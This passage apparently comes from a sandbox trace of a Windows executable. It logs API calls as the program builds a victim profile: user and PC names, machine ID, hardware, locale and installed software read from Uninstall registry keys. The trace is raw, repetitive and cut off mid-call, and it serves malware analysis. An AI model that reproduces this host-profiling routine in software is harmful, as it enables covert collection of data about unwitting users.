11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 ", lpString2="10.0.40219" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219" [0175.953] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\n" [0175.953] RegCloseKey (hKey=0x354) returned 0x0 [0175.954] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x3a, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.954] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757") returned 100 [0175.954] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.954] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.954] RegCloseKey (hKey=0x354) returned 0x0 [0175.954] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x3b, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.954] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173") returned 100 [0175.954] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.954] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.954] RegCloseKey (hKey=0x354) returned 0x0 [0175.954] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x3c, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.954] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860") returned 100 [0175.954] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.955] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.955] RegCloseKey (hKey=0x354) returned 0x0 [0175.955] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x3d, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.955] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655") returned 100 [0175.955] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.955] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.955] RegCloseKey (hKey=0x354) returned 0x0 [0175.955] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x3e, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.955] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743") returned 100 [0175.955] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.955] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.955] RegCloseKey (hKey=0x354) returned 0x0 [0175.955] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x3f, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.955] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063") returned 100 [0175.955] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.956] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.956] RegCloseKey (hKey=0x354) returned 0x0 [0175.956] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x40, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.956] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573") returned 99 [0175.956] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.956] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.956] RegCloseKey (hKey=0x354) returned 0x0 [0175.956] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x41, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.956] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}") returned 90 [0175.956] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.956] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, 